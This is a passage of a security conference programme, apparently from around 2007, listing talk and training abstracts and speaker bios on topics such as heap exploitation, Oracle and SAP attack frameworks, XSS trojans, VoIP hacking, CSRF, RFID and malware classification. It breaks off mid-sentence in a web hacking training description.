RPC Auditing Tools and Techniques

Aaron Portnoy, Cody Pierce, TippingPoint Security Research Team
RPC auditing is currently a tedious and manual process. When complex embedded structures, arrays, and unions are present in an IDL, coding the client involves much debugging and time. The discussed tools are the culmination of a few weeks worth of research performed by Aaron Portnoy and Cody Pierce that allow a researcher to very quickly be able to communicate and audit an RPC server. Functionality includes tools that recursively finds binaries that import RpcServer* functions and proceeds to run IDA in batch mode to generate IDBs and IDLs, a lexer and parser to turn the IDL's opcodes, structures, and unions into instantiated, fuzzable Python objects and an NDR library that defines how the NDR data will be packed for transport.
Aaron Portnoy, aka deft, is a researcher within TippingPoint's security research group. His responsibilities include reverse engineering, vulnerability discovery, and tool development. Aaron has discovered critical vulnerabilities affecting a wide range of enterprise vendors including: Microsoft, RSA, McAfee, Citrix, Symantec, Hewlett-Packard, IBM and others. Additionally, Aaron has contributed mind share and code to OpenRCE, PaiMei, and various white papers and books. Cody Pierce, aka intropy, is a researcher within TippingPoint's security research group. His responsibilities include reverse engineering and developing auditing and reverse engineering automation tools. Cody has discovered critical vulnerabilities affecting a wide range of enterprise vendors, including: Microsoft, Hewlett-Packard, America Online, Computer Associates and others. Prior to TippingPoint, Cody was a security researcher for Citadel Security Software responsible for vulnerability analysis, research, and remediation. Though he spends much of his personal and free time in the world of a reverse engineer, Cody's true passion is music.

Windows Heap Protection: Bypassing requires understanding

Dave Aitel, Immunity, Inc.
Introduction "Heap exploits are dead. Heap exploits remain dead. And we have killed them." Sending a crafted string and getting reliable shellcode execution back in one easy step is now history (in fact it always was). The future of heap exploitation lays not in hoping some magical technique will get us the unlink trick back, but in understanding the heap allocation algorithm itself, crafting a suitable heap layout during the different phases of exploitation, and taking advantage of structures supplied by the server itself. There is no generic way to do this, but tools will be presented to relieve the pain of manual analysis and help exploit developers understand and exploit the wildness of the heap. Abstract The presentation discusses heap overflow protection mechanisms on the Windows operating system, and the weakness of existing techniques that try to bypass these protections. A methodology for understanding and manipulating heap layouts during different phases of exploitation will be shown, supported by a series of tools written specifically for this task. The presentation will explore the various techniques and tools available to the researcher, including heap fuzzing, fingerprinting, data recognition and memory leaks, enabling the researcher to craft a reliable heap layout and overflow his way to shellcode execution.

Oracle Security: Orasploit

Alexander Kornbrust, Red Database Security
Orasploit is an Oracle exploit framework which automatically exploits vulnerabilities in Oracle databases. With orasploit it is possible to exploit an (unprotected/unpatched) database. Orasploit supports various exploits, privilege escalation techniques and many different payloads. We show different possibilities to create / write / read files, D.o.S., new ways to send data via HTTP requests from the database, ... It's possible to extend orasploit with own/custom exploits.
Alexander Kornbrust is the founder and CEO of Red-Database-Security GmbH, a company specialized in Oracle security. Red-Database-Security is one of the leading companies in Oracle security. He is responsible for Oracle security audits and Oracle anti-hacker trainings and gave various presentations on security conferences like Black Hat, Bluehat, IT Underground. Alexander Kornbrust has worked with Oracle products as an Oracle DBA and Oracle developer since 1992. During the last six years, Alexander has found over 220 security bugs in different Oracle products.

Naked Security : The State of the Application Security Industry

Mark Curphey, Microsoft
If you follow the popular press you may think that the only thing to worry about if you build software is Cross-Site Scripting or be convinced that for a few thousand dollars you could buy a shiny red button and the problems of insecure software would go away. In this presentation Mark Curphey will dissect the state of the application security industry including the current state of tools, technologies and shared knowledge. As an evening talk expect a little bit of humour!
Mark Curphey heads up Microsoft’s ACE Team in Europe. He ran Foundstone from 2004 to 2006, was the Director of software security at Charles Schwab in San Francisco and started OWASP way back when. He has a Masters degree in Info Sec (cryptography) from Royal Holloway in London. Royal Holloway is recently famous as the cryptography school where the cryptographer Sophie Neveu was educated in the bestselling novel “The Da’Vinci Code”. His blog (http://www.securitybuddha.com) is recommended reading for professional development by the RSA Conference Committee.

Browser Hijacking

Daniel Fabian, SEC Consult
Current XSS attacks make use of the document object model to steal session credentials from unsuspecting users, allowing the attacker to impersonate his victim. Well known attacks also include relogin trojans or keyloggers. These attacks work well in some environments, but are not really suited for complex applications like e.g. online banking systems, where individual TAN codes are needed to complete a transaction. This talk introduces Trabbler, the first highly versatile “cross site scripting Trojan”. Once injected via XSS, Trabbler takes control over the victim ́s current session, allowing the attacker to watch and manipulate its actions on the vulnerable website. During the hijacking attack, instances of Trabbler communicate with a central control server, which gives it botnet-like capabilities. Trabbler ́s design is modular, meaning custom script-modules can be downloaded to the infected browser. This makes it useful for very specific attacks, e.g. manipulating a transaction during execution. Other modules include a keylogger and a browser camera, which allows the attacker to watch his victim ́s actions in real time. In the talk, we will discuss Trabbler ́s architecture and code and give practical examples of its application.
Daniel Fabian has been working as a security consultant for SEC Consult GmbH for several years. His job includes conducting penetration tests and code reviews for Austrian and German banks and other major customers. As chief of security research he also manages the companies vulnerability research activities.

Practical VOIP/SIP Hacking

Klaus Darilion, nic.at/enum.at
This training teaches you how you can hack typical SIP provider setups. For this, we take a look at SIP and analyze weak points, which will be our potential point of attack. We further take a look at the most used SIP products (ser/openser, Asterisk, Cisco Gateway). This products can be operated in a secure way when configured properly, but often serive providers do not know about the potential weakness thus giving hackers a chance. Typical hacking goals are: - authentication bypass - achieve free calling - make DoS attacks against the VoIP service - identity spoofing The training will be split into a theoretical part and a practical part. The theoretical part will teach the relevant details of the SIP protocol and the potential attack scenarios. The practical part shows how to detect vulnerabilities and presents tools to ease hacking. The hacking is done against a virtual SIP Service Provider (a SIP proxy and a gateway in a typical SIP provider setup).
Klaus Darilion is an expert in the fields of SIP based communications. He studied electrical engineering at the Vienna University of Technology, where he later wrote a Doctor thesis about SIP based voice communication for public safety applications. Klaus Darilion is now employed with enum.at, the Austrian ENUM registry, where he is working in the fields of ENUM based call routing and all kinds of SIP based communication. This involves standardization in national and international working groups like the IETF SPEERMINT group. Currently he is working on security reviews of VoIP provider infrastructure. Besides all the theoretical work, Klaus Darilion also experienced practical knowledge as user and developer of the open source SIP proxies ser and openser.

A Discussion on Memory-Resident Backdoors in Oracle

David Litchfield, x
Oracle "rootkits", in other words backdoors, have been discussed in the past but none that merit any serious concern. So far, those that have been presented are simple and trivial to spot. This presentation will look at memory-resident backdoors that are considerably harder to find, delivery mechanisms and potential defences. A working example will be demonstrated.
David Litchfield specializes in searching for new threats to database systems and web applications. He has lectured to both British and U.S. government security agencies on database security and is a regular speaker at the Blackhat Security Briefings. He is a co-author of "The Database Hacker's Handbook", "The Shellcoder's Handbook", "SQL Server Security", and "Special Ops". In his spare time he is the Managing Director of Next Generation Security Software Ltd.

Breaking and Securing Web Applications

Nitesh Dhanjani, none
The application layer exposes an organization to a huge attack surface. A single coding error within millions of lines of code can deem disaster for organization. Security products and consultants are trying hard to keep up with the new attack vectors, but so are the attackers. Few security vendors will admit the class of vulnerabilities that cannot be scanned, parsed, or fuzzed for. There are the categories of extremely high risk vulnerabilities that continue to plague web applications because organizations do not realize the root cause of these vulnerabilities while commercial product vendors continue to promise a one-click-and-scan solution. This talk will focus on the discussion of high risk vulnerabilities that plague web applications today, including the following: Cross Site Scripting (XSS), Cross Site Request Forgery (XSRF), (anti) DNS Pinning, Browser plugin hijacking, and more. This talk will also discuss how these vulnerabilities can be abused by an external entity to launch attacks against a company's internal network. These attacks are lethal because they can be abuse a a legitimate user's browser to act as a proxy between the attacker and the company's internal network. In other words, stop believing the security vendor hype. Your applications are more vulnerable than ever before, it has become much harder to secure them, and your 'enterprise' crown jewels are most likely hanging out in the open.
Nitesh Dhanjani is the author of "Network Security Tools: Writing, Hacking, and Modifying Security Tools (O'Reilly)" and "HackNotes: Linux and Unix Security (Osborne McGraw-Hill)". Nitesh is currently the Senior Director of Application Security Engineering at a large corporation in the United States. Prior to this, Nitesh was a Manager at the Advanced Security Labs at Ernst & Young LLP. Prior to Ernst & Young, Nitesh was a Senior Consultant at Foundstone where he contributed to and taught Foundstone's "Ultimate Hacking: Expert" and "Ultimate Hacking" security courses. Nitesh has performed hundreds of security assessments, including Attack & Penetration reviews, source code reviews, and security architecture reviews for many of the Fortune 500 companies. He is also a contributing author to the best selling security book "Hacking Exposed 4". Nitesh has been invited to talk at various information-security related conferences including Blackhat, RSA, Hack in the Box, and OSCON. He graduated from Purdue University with both a Bachelors and Masters degree in Computer Science.

Carmen, Rogue Web Server

Simon Roses Femerling, Microsoft
Carmen is a unique web server written 100% in python that covers the gap in web security assessment when a rogue webserver is needed. Using Carmen any security expert will be able to audit web browsers, mapping host/networks and study intruder attacks and much more! Carmen brings many interesting features to the game ;) • Web Simulation (Apache, IIS, etc...): Carmen can simulate well-known web servers but you can also combine server’s features. • Fake Cookie Generation: Carmen has 8 cookie generation methods to confuse / defeat session ID analysis. • Fake Errors: Carmen will display errors from well know servers or/and you can customize the errors. • Plugin Support: Write your own plugins to interact with the servers and handle clients :) • 100% in Python (open source): Carmen is cross-platform. • CGI execution: You can create cgi scripts using python. • And many things more. Carmen can be used as: • Rogue Web Server. • Mapping Internal Network Tool. • Web Honeypot (Standalone application or in union with other tools like honeyd). • Logging/Analyze/Attack Client Browsers. • Pen-Tester Tool. • Confuse/Test/Attack Scanner Tools. Carmen can be used as an offensive tool to attack browsers, security tools, etc or as a defensive tool like a web honey pot. You can also write web applications on top on Carmen to make the illusion more real.
Simon Roses Femerling is a Security Technologist at the ACE Team at Microsoft. Former PwC and @Stake. He has many years of security experience where he has authored and cooperated in several security Open Source projects and advisories. Simon is natural from wonderful Mallorca Island in the Mediterranean Sea. He holds a postgraduate in E-Commerce from Harvard University and a B.S. from Suffolk University at Boston, Massachusetts.

Flash Security Basics

fukami, SektionEins
The lecture will give an overview over the history of Flash/ActionScript, its capabilities, object and security model. Common mistakes of developers will be discussed, including an analysis of possible exploits. There will be also a section which introduces free and commercial tools for auditing.

Collecting and Managing Accumulated Malware Automatically

Georg Wicherski, mwcollect.org, EmsiSoft, RWTH Aachen
With the nepenthes Platform, we are able to collect malware autonomously. Centrally collecting this malware over months yielded to a vast, unmanagable, giant heap of binary data. We show, how we managed to eventually do something useful with this data, by extracting different information using - sandboxing - recording of attacker information - botnet monitoring and introduce the functionality of the tools, we developed for these means.
At least Paul knows me personally, I think. Georg Wicherski is an 19-year old German university student with experience in the fields of botnet tracking and mitigation, malware analysis and network engineering. He co-authored the Honeynet Project's paper "Know Your Enemy: Tracking Botnets'' and two papers submitted to ESORICS and DFN-Cert Workshop. He also published his paper "Medium Interaction Honeypots'' on the Internet. Additionally, he presented on Blackhat Asia 2006 and the 23C3. His fields of interest besides malware and botnets include robotics engineering and programming as well as wireless appliances. He is the author of the mwcollectd medium-interaction-honeypot and nepenthes developer. He founded and now leads the mwcollect Alliance, a non-proifit organization aiming at collecting malware with now over 25000 unique in-the-wild samples. <http://www.pixel-house.net/>

Intercepting GSM traffic

Steve, x
This talk is about GSM security. We will explain the security, technology and protocols of a GSM network. We will further present a solution to build a GSM scanner for $900. The last part of the talk focuses on cracking a GSM converstation. http://wiki.thc.org/gsm
An enthusiastic security researcher. Email: Steve at segfault.net

Automated structural classification of malware

Halvar Flake, x
Malware authors are changing: In the past, their motivation was fame, nowadays it is mostly money. With the change of focus, development practices on the side of the malware authors are changing, too: Hand-crafted polymorphic assembly code is out, cheap-to-maintain-and-develop C/C++ code is in. Simple 'offline polymorphism' (e.g. clever recompile with small changes) and targeted attacks allow the evasion of traditional AV signatures without giving up on massive code reuse. To automatically deal with the (almost boringly) growing flood of malware, several classification methods have been proposed - ranging from looking at instructions n-grams and n-perms and other "features" to generate high-dimensional vectors to behavioral techniques. These techniques suffer from the drawback of high 'brittleness', e.g. they can be easily circumvented without requiring significant skill or time on the side of the malware author. This talk will discuss using structural (e.g. callgraph- and flowgraph-based) metrics for the automated classification of malware into families. The advantage of the discussed approach is it's relative 'suppleness' - it is resistant up to drastic measures such as 'recompiling a virus for a different architectures' etc. A significant investment of work is needed on the malware authors side to break the analysis. An example implementation of a fully automated malware classification system (VxClass) which automatically unpacks, disassembles, and compares new malware against an existing database will be discussed, and a number of horribly incorrect predictions about the future will be given.
Originating in the fields of copy protection and digital rights management, he gravitated more and more towards network security over time as he realized that constructive copy protection is more or le ss fighting windmills. After writing his first few exploits he was hooked and realized that reverse engineering experience is a very handy asset when dealing with COTS software. With extensive experience in reverse engineering, network security, penetration testing, and exploit development, Halvar consults on reverse engineering and is a graduate student of mathematics in Germany.

Destructive Data - Designing Inputs That Make Software Fail

Heikki Kortti, Codenomicon Ltd
What makes software fail? This talk describes techniques for creating effective malicious inputs designed to break network protocol and file format implementations. We look at the categories of destructive data, map them to practical examples taken from common network protocols and file formats, and analyze past vulnerabilities that could be triggered by these inputs. For selected vulnerabilities, we look at source code to understand how the malicious inputs reach the problematic portions of code and how each vulnerability is ultimately triggered. The analyzed interfaces include both wired and wireless protocols as well as various file formats including images, video and compression formats and X.509 certificates. We observe that only a few relatively simple insights, combined with a solid knowledge of common categories of data structures, already helps break most implementations through rigorous negative black-box testing. From a proactive perspective, understanding what kinds of inputs typically trigger common programming errors also helps developers protect against attacks and to avoid most common problems.
Heikki Kortti is a Robustness Specialist at Codenomicon Ltd. With a background in network and systems administration, he has been working with information security since 1993. At his present job at Codenomicon, he has developed security testing suites for protocols such as BGP4, DNS, SMTP, IMAP, and POP3, as well as actively participated in the development of tests for more than 130 other protocols and file formats. He has personally witnessed countless network servers, client applications, routers, switches, VoIP equipment, web browsers, operating systems, mobile phones, games systems, media players, virus scanners and firewalls fail and beg for mercy at the purifying altar of automated input testing.

New Security Model of Bluetooth 2.1

Marcel Holtmann, BlueZ Project
The security architecture of Bluetooth changes a lot with the upcoming Bluetooth 2.1 specification. This presentation will probably be one of the first that shows it and give details of its inner working. - Old Bluetooth security architecture - New Bluetooth security architecture - What has changed (for better or worse) - Does it really improve security or is it only usability
Marcel Holtmann is the maintainer and the core developer of the official Linux Bluetooth stack which is called BlueZ. He started working with the Bluetooth technology back in 2001. His work includes new hardware drivers, upper layer protocol implementations and the integration of Bluetooth into other subsystems of the Linux kernel.

Reasonable Disclosure

Jeff Moss, Founder &amp; Director, Blackhat

Securing Networked Infrastructure through Seven Layers of Insecurity

Michael Kafka, René Pfeiffer, self employed
The training addresses the basics of security from the viewpoint of the network and networked applications. It addresses every layer of the OSI model present in typical networked environments and explore attack vectors and remedies alike. We furthermore classify potential attackers in order to present a detailed view of the adversaries. We have prepared a lab environment that can be used for demonstrations throughout the training. Participants can safely try attack methods at this virtual shooting range.
René Pfeiffer was born in 1972 and pursued the study of physics at the University of Gießen and Vienna. He turned to professional system administration and software development and is working in this field for over 10 years, most of the time as freelance consultant. He teaches computer security at the Technikum Wien since 2001. Michael Kafka is working as a trainer and consultant for networking and security for over 10 years. He is a Cisco-certified trainer and has a lot of experience designing workshops and lectures.

Fuzzing and Exploiting Wireless Drivers

Sylvester Keil / Clemens Kolbitsch, Vienna University of Technology, Sec Consult
This paper documents the process of identifying potential vulnerabilities in IEEE 802.11 device drivers through fuzzing. The relative complexity of 802.11 as compared to other layer two protocols imposes a number of non-trivial requirements on regular 802.11 protocol fuzzers. This paper describes a new approach to fuzzing 802.11 device drivers on the basis of emulation. First, the process of creating a virtual 802.11 device for the processor emulator QEMU is described. Then, the development of a stateful 802.11 fuzzer based on the virtual device is discussed. Finally, we report the results of fuzzing the Atheros Windows XP driver, as well as the official and open source MADWifi drivers. Furthermore, to document the process of exploiting 802.11 wireless device driver vulnerabilities, the issues of executing arbitrary code in kernel-mode on Linux and Windows systems will be addressed as well. We will present an Metasploit exploit implementation similar to the stager-approach taken in Metasploit's Windows kernel-mode exploits.
<p>Clemens Kolbitsch is currently finishing his master studies ("Software Engineering and Internet Computing") at the Technical University in Vienna, Austria. His main research is computer security with a special interest in memory management and virtual machines. </p><p> Sylvester Keil is also finishing his master studies ("Software Engineering and Internet Computing") at the Technical University in Vienna, Austria. </p><p> Besides their research into wireless 802.11 vulnerability detection, they are currently working on linux kernel mode exploitation techniques, both supported by SEC Consult Unternehmensberatung GmbH. </p>

Audit of the RFID ePassport and the concepts

Lukas Grunwald, Neo Catena Networks Inc.
After some introduction to the RFID technology and security risks, a deep technical overview of the risks and audit methodology will be given.
Lukas Grunwald is the CTO of DN-Systems Enterprise Internet Solutions GmbH (Hildesheim/Germany) a globally acting consulting office working mainly in the field of security identity, and internet/eCommerce and Supply Council solutions for enterprises. He is one of the founders of Neo Catena Networks Inc. in California as well. Mr. Grunwald has been working in the field of IT security for nearly 15 years now. He is specializing in security of wireless and wired data and communication networks, forensic analysis, audits and active networking. Mr. Grunwald regularly publishes articles, talks and press releases for specialist publications. He also participates actively in conferences such as Hackers at Large, Hacking in Progress, Network World, Internet World, Linux World (USA/Europe), Linux Day Luxembourg, Linux Tag, CeBIT and Blackhat Breefings.

SAP (In)Security

Mariano Nuñez Di Croce, CYBSEC
This training is aimed to dive into the world of SAP security. You will learn which are the key security components of SAP systems, covering all its aspects: . Security of the Operating System . Security of the Database Server . Security of SAP R/3: . Transport System security . User managment and administration . Communication security . Connectivity security . System upgrade and patching . Logs and auditing . Attacking a SAP system . sapyto
I have been working as a security consultant for CYBSEC for the last 3 years, focused on Penetration Testing and Vulnerability Research. I have discovered critical vulnerabilities in Microsoft, SAP and several security products. I am the developer of sapyto, the first public framework to carry out Penetration Tests over SAP systems. I have spoken at many security conferences in Latin & Central America and recently at Blackhat.

Attacking the Giants: Exploiting SAP Internals

Mariano Nuñez Di Croce, CYBSEC
The SAP Remote Function Call (RFC) Interface is the heart of communications between SAP systems, and between SAP and external software. Almost every system that wants to interact with SAP does so using the RFC interface. As stated by SAP: "The RFC library is the most commonly used and installed component of existing SAP software". Our presentation will describe, after a short description of RFC interface purpose and internals, vulnerabilities discovered in our research, both in the RFC protocol implementation and in the RFC Library itself. Besides these vulnerabilities, we will be disclosing new vulnerabilities in other related SAP key components. Beyond this, we will be presenting different attacks, abusing default mis-configurations and design flaws. These attacks will let you: . Grab logon credentials. . Hi-jack RFC communications. . Perform Man-In-The-Middle attacks over RFC. . COMPLETELY OWN a SAP Application Server, remotely. All these attacks will be demonstrated live with the help of sapyto, the first public framework for Penetration Testing of SAP systems. This tool enables penetration testers to assess the security of SAP systems. It can perform harmless security audits, but also active exploitation of discovered flaws. The stable version of sapyto will be released, shipped with many new plugins.
I have been working as a security consultant for CYBSEC for the last 3,5 years, focused on Penetration Testing and Vulnerability Research. In penetration testing, I have analysed critical national and international systems and applications. As for vulnerability research, I have discovered critical vulnerabilities in Microsoft, SAP and several security products. I am the developer of sapyto, the first public framework to carry out Penetration Tests over SAP systems. I have spoken at many security conferences in Latin & Central America and recently at Blackhat.

The Three Faces of CSRF

Martin Johns, University of Hamburg
Even though Cross Site Request Forgery (CSRF) vulnerabilities have made it into the OWASP Top 10 [1], this vulnerability class is still often ignored and almost always belittled. While in 2006 alone 1282 XSS vulnerabilities were collected by the CWE project, only 5 (!) CSRF issues were recorded in the same timeframe [2]. This talk will discuss the various existing CSRF attack vectors and exemplify the issues with real world examples: * Executing arbitrary actions on the web application using the attacked user's identity and authentication context * Subverting the company's firewall and exploring the intranet * Leaking sensitive informations via hijacking JSON data Furthermore, we will demonstrate how a simple CSRF exploit can be created semi-automatically in less the 5 minutes. The last quarter of the talk will be devoted to a brief overview on our client side CSRF protection tools RequestRodeo [3] and LocalRodeo [4]. [1] OWASP Top 10: http://www.owasp.org/index.php/Top_10_2007 [2] Vulnerability Type Distributions in CVE: http://cwe.mitre.org/documents/vuln-trends/index.html [3] RequestRodeo: http://www.nongnu.org/requestrodeo/ [4] LocalRodeo: http://databasement.net/labs/localrodeo/
Martin Johns studied Mathematics and Computer Science at the Universities of Göttingenn (Germany), Santa Cruz (CA) and Hamburg (Germany) where he received his diploma in 2003. During the 1990ties and the early years of the new millennium he earned his living as a software engineer in German companies (including Infoseek Germany, TC Trustcenter and SAP). 2005 he joined the "security in distributed systems" group at the University of Hamburg to work on the project "Secologic", which is investigating the state of the art in software security.

The RFID Guardian

Melanie Rieback, Vrije Universiteit Amsterdam
This talk will present the design and implementation of the RFID Guardian, the first-ever unified platform for RFID security and privacy administration. Radio Frequency Identification (RFID) tags are remotely-powered data carriers, that are often touted as "computers of the future", that bring intelligence to our homes and offices, optimize our supply chains, and keep a watchful eye on our pets, livestock, and kids. The RFID Guardian resembles an "RFID firewall", enabling individuals to monitor and control access to their RFID tags by combining a standard-issue RFID reader with unique RFID tag emulation capabilities. Our system provides a platform for coordinated usage of RFID security mechanisms, offering fine-grained control over RFID-based auditing, key management, access control, and authentication capabilities. We have prototyped the RFID Guardian using off-the-shelf components; compatible with the ISO 15693/14443 (13.56 MHz) RFID standards, it performs RFID tag emulation and selective RFID tag jamming.
Melanie Rieback is a final-year Ph.D. student in Computer Systems at the Vrije Universiteit in Amsterdam, where she is supervised by Prof. Andrew Tanenbaum. Melanie's research concerns the security and privacy of Radio Frequency Identification (RFID) technology, and she leads multidisciplinary research teams on RFID security (RFID Malware) and RFID privacy management (RFID Guardian) projects. Her research has attracted worldwide media attention, appearing in the New York Times, Washington Post, Reuters, UPI, Computerworld, CNN, BBC, MSNBC, and many other print, broadcast, and online news outlets. Melanie's research has received several awards (Best Paper: IEEE PerCom '06, Best Paper: USENIX Lisa '06, NWO I/O Prize, VU Mediakomeet, ISOC Award finalist), and Melanie has also served as an invited expert for RFID security discussions with both the American and Dutch governments. In a past life, Melanie also worked on the Human Genome Project at the Whitehead Institute / MIT Center for Genome Research.

Hijacking Virtual Machine Execution for Fun and Profit

Nguyen Anh Quynh, National Institute of Advanced Industrial Science and Technology, Japan
In general Virtual machine (VM) technology can guarantee strong isolation between VMs, so even if a VM is hacked, other VMs are still not vulnerable. However, this talk demonstrates that if the attacker takes over the host VM, he can do pretty much anything he wants with the guest VMs. Several sophisticated techniques to hijack the execution of a running VM are presented, which can be used to redirect any VM execution at will. While the proposed methods are not limited to any kind of virtual machine, we demonstrate them with Xen Virtual Machine. In a demo, the attacker dynamically injects few bytes (less than 10 bytes) into a running Linux VM, then captures (and later replay) all the keystrokes and output screen of the VM's consoles. The hijacking does not generate any negative impact in I/O performance, therefore not likely to cause any suspect to the VM's owner. Meanwhile, the hijacking technique can also offer great benefit for the white-hat people. The second demo proves that with only few bytes injected into a protected VM, we can have a file-system integrity tool. Compared to traditional approaches like Tripwire, this IDS offers some advantages such as: real-time detection, zero deployment cost, richer intrusion evidence, and less exposed to attacker. The presented techniques work with any kind of OS-es, and need absolutely no modification to the kernel of the guest VMs or to the hypervisor. Besides, everything is done inside the user-space, thus straightforward to implement, and requires no deep knowledge about OS kernel.
Nguyen Anh Quynh is a postdoctoral researcher at National Institute of Advanced Industrial Science and Technology (AIST), Japan. His research interests include computer security, networking, data forensic, virtualization, Trusted Computing and Operating System. His papers have been published in various academic conferences, such as ACM, IEEE, LNCS, Usenix among others. Quynh is a contributor of numerous open source projects (notably are Xen Virtual Machine and Linux kernel). He loves to get involved with the industry, and he gave talks at hacking conferences such as EusecWest, HackInTheBox, Hack.lu. Quynh obtained PhD degree of computer science in Keio University, Japan. He is also a member of Vnsecurity, a pioneer information security research group in Vietnam.


Ofir Arkin, Insightix
Network admission control (NAC), network access protection (NAP), network access control (NAC), and many other acronyms refer to a technology which aim to provide with access control verification before (and after) allowing an element to access the network. Unfortunately due to the lack of standardization, and the diversity of solutions, many (if not must) NAC solutions suffer form a multitude of weaknesses impacting the deployment, implementation and the overall protection they provide. The presentation examines various NAC solutions from leading vendors, highlight their weaknesses, and demonstrate how they can be bypassed. The presentation is an updated presentation, which includes new material, and new unpublished methods to bypass NAC solutions.
Ofir Arkin is the CTO of Insightix (http://www.insightix.com), leading the development of the next generation of IT infrastructure discovery, monitoring and network access control systems for enterprise networks. He holds more then 10 years of experience in data security research and management. He had consulted and worked for multinational companies in the financial, pharmaceutical and telecommunication sectors. Ofir is the author of a number of influential papers on information warfare, VoIP security, network discovery and network access control and lectures regularly at security conferences. Ofir is chair of the security research committee of the Voice Over IP Security Alliance (VoIPSA). Ofir is the founder of Sys-Security Group (http://www.sys-security.com), a computer security research group.

The Business Case for removing your perimeter

Paul Simmonds, Global Information Security Director, ICI, Jericho Forum
The days of the corporate network, completely isolated with a well secured outer shell are long gone; yet we continue to cling to this model. Global networks with no borders, offer the potential of substantial savings in communications costs, maximum network agility and instant connectivity for clients and partners. Can you secure this incredibly compelling business model, and provide a long-term business case for security where security contributes to the corporate bottom line and the CISO is seen to be a true partner in corporate strategic thinking. What does business need from it's suppliers to make this a feasible reality? What do you need to be doing now to achieve this goal?
Paul Simmonds joined ICI in 2001 when he was recruited to head up Information Security for ICI (www.ici.com), working for the CIO Office in London. Prior to joining ICI he spent a short time with a high security European web hosting company as Head of Information Security, and before that seven years with Motorola, again in a global information security role. Paul is also a founding member of the Jericho Forum, a pan-global grouping of corporate companies working to define the issues and benefits of operating in a deperimiterised environment. In his career he has worked with many external agencies, including the FBI, Scotland Yard, Wiltshire Computer Crime and Wiltshire Child protection. He has also been directly involved in two successful criminal prosecutions, giving evidence in one case. Paul has a degree in Electronic Engineering and a City & Guilds in Radio Communication and is also a qualified kayak coach. He came to the Information Security field from a background in IT Systems Implementation and consultancy during which he wrote and implemented one of the UK's first web sites. He is married with three children and a very understanding wife and in the little spare time that he has teaches canoeing and runs charity radio stations.

the many dimensions of security in eVoting

peter purgathofer, vienna university of technology
various forms of eVoting are quickly becoming a hot item everywhere. while some societies bet on voting machines, other go directly for online voting. the talk discusses the wide array of security aspects that arise with this techno-social development.
scientist at institute for design and assessment of technology since 1991. founder of uid lab in vienna. current work in interaction design, game design, eLearning and aspects of informatics and society.

Doppelgänger - novel protection against unknown file format vulnerabilities

Rich Smith, Hewlett-Packard Labs, Trusted Systems Lab
The presentation intends to discuss the development of a general technique for protection against unknown threats to applications through maliciously constructed data files. The technique is general in nature and could be applied in many ways. Two proof of concept applications will be discussed, one of which can be demonstrated. There has been a steady increase in attacks taking advantage of defects in client applications through malformed data files (WMF, ANI etc). Such attacks rely on having specifically crafted data inside files associated with affected applications, and are increasingly utilising unknown, unpatched vulnerabilities (0-day) in specifically targeted attacks against both industry and government. By definition signature based approaches to try and identify and stop such 0-day file format attacks are bound to fail. The Doppelgänger approach is a novel defence against this class of client side attacks – its key difference being that it is able to defend against both known and unknown threats to client applications from malformed data files. Doppelgänger achieves this through the random transformations of a files data content, while maintaining an informational and functional equivalence.
Rich Smith is a security researcher in the Trusted Systems Lab for Hewlett-Packard, based in Bristol UK. His main research is in the area of threat futures and he is interested in novel attack vectors, proactive defence techniques and protection against unknown threats. He develops new technologies for use both internally within HP and for enterprise and government customers. He has been working at HP Labs for 4 years, has an BSc in Computational Chemistry, an MSc with distinction in Information Security and is currently undertaking a Contemporary Arts foundation course alongside his full time security research.

Disruptive modernization of legacy systems

Shalom Carmel, --
The talk will demonstrate, by using IBM system i as an example, the disruptive effect modernization and adoption of new tech may have on security of legacy systems.
Currently, Shalom is employed in a large pharmaceutical company, where he is responsible for application integration, web technologies and e-business technologies. Before that he worked in a variety of jobs and roles in IT and MIS, including ERP implementations, security consulting, web applications development and others.

Web 2.0 Application Kung-Fu - Securing Ajax & Web Services

Shreeraj Shah, Net Square Solutions Pvt. Ltd.
With Web 2.0 applications being adopted by businesses at a very quick pace, security concerns around these technologies too have grown. Ajax and Web Services are key components in the Web 2.0 framework. Understanding new technology key components vis-à-vis attack vectors is imperative if the security concerns are to be adequately addressed. Financial services companies such as Wells Fargo and E*Trade are adopting Web 2.0 technologies by building next generation Enterprise 2.0 solutions. Ajax fingerprinting, crawling and scanning are key aspects for Web 2.0 threat profiling. It is possible to identify XSS and XSRF vulnerabilities and likely weak entry points on the basis of proper threat profiles. As ethical hackers, scanning and fuzzing must be accomplished before attackers have the chance to exploit vulnerable Web Services running on XML-RPC, SOAP and REST. This presentation is going to reveal methodologies, techniques and tricks to hack Web 2.0 applications and defense strategies to secure them. The presentation includes a number of demonstrations and real-life cases encompassing next generation attacks and defense. The speaker has already authored several tools – wsChess (Web Services hacking toolkit), Ajaxfinger, ScanAjax and MSNPawn – that will be demonstrated in detail.
Shreeraj Shah, B.E., MSCS, MBA, is the founder of Net Square,a company that provides security consulting, training and development services to the world’s leading software vendors, financial and professional service providers. Prior to founding Net-Square, he has worked with Foundstone, Chase Manhattan Bank and IBM. He has performed several security consulting assignments in the area of penetration testing, code reviews, web application assessments and security architecture reviews. He is also the author of Hacking Web Services (Thomson) and co-author of Web Hacking: Attacks and Defense (Addison-Wesley). In addition, he has published several advisories, tools, and whitepapers, and has presented at numerous conferences including RSA, AusCERT, InfosecWorld (Misti), HackInTheBox, Blackhat, OSCON, Bellua, Syscan, etc. His articles are regularly published on Securityfocus, InformIT, DevX, O’reilly, HNS. His work has been quoted on BBC, Dark Reading, Bank Technology as an expert. You can read his blog at http://shreeraj.blogspot.com/

Web Hacking Training

Shreeraj Shah, Blueinfy
A growing concern has been Web application security Web and application servers are the target of regular attacks by attackers that exploit security loopholes or vulnerabilities in code or design. Adding to this concern are next generation applications; applications that are on the fast track and more appealing to the user, utilizing dynamic AJAX scripts, Web services and newer Web technologies to create intuitive and easy interfaces. The only constant in this space is change. In this dynamically changing scenario it is important to understand new threats that emerge in order to build constructive strategies to protect corporate assets. This two day workshop will expose students to both aspects of security: attacks and defense. To think of newer Web applications without Web services is a big mistake. Sooner or later existing applications will be forced to migrate to the new framework. This workshop includes several cases, demonstrations and hands-on exercises with newer tools to give you a head start over others in the field. The following topics will be covered in-depth during these sessions: # Web Security Fundamentals and Principles, Trends and Opportunities # Methods, Components and Protocols (HTTP, HTTPS and SOAP) # Web application assessment methods - Blackbox and Whitebox approaches # Web application Deployment and Security Deployment issues # Web application Footprinting, Discovery and Profiling # Search engines and their role in Web Application hacking (Google & MSN) # Web application attack vectors and assets-to-attacks-mapping # XML-based attacks # SQL, LDAP, XPATH injection techniques # XSS, Cross-site cookie spoiling and AJAX-hacking # Web services footprinting, discovery and profiling # Web services attacks # Web application firewall - Build 